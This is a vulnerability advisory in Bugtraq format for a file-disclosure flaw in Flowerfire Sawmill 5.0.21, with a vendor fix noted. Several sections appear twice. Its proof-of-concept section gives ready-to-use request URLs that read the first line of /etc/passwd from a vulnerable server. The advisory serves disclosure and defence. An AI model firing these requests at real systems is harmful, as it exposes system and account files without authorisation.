Flowerfire Sawmill File Access Vulnerability
BID:1402
Info
Flowerfire Sawmill File Access Vulnerability
| Bugtraq ID: | 1402 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jun 26 2000 12:00AM |
| Updated: | Jun 26 2000 12:00AM |
| Credit: | Posted to BugTraq on June 26th by Larry Cashdollar ([email protected]). |
| Vulnerable: |
Flowerfire Sawmill 5.0.21 |
| Not Vulnerable: | |
Discussion
Flowerfire Sawmill File Access Vulnerability
Sawmill is a site statistics package for Unix, Windows and Mac OS. A specially crafted request can disclose the first line of any world readable file for which the full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".'
Sawmill is a site statistics package for Unix, Windows and Mac OS. A specially crafted request can disclose the first line of any world readable file for which the full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".'
Exploit / POC
Flowerfire Sawmill File Access Vulnerability
The following request will display the first line of /etc/passwd
http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
If sawmill is run as a cgi script, the following can be used instead:
http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
The following request will display the first line of /etc/passwd
http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
If sawmill is run as a cgi script, the following can be used instead:
http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
Solution / Fix
Flowerfire Sawmill File Access Vulnerability
Solution:
Flowerfire has upgraded their product free of charge to address this problem.
Flowerfire Sawmill 5.0.21
Solution:
Flowerfire has upgraded their product free of charge to address this problem.
Flowerfire Sawmill 5.0.21
-
Flowerfire Flowerfire
http://www.flowerfire.com/
References
Flowerfire Sawmill File Access Vulnerability
References:
References: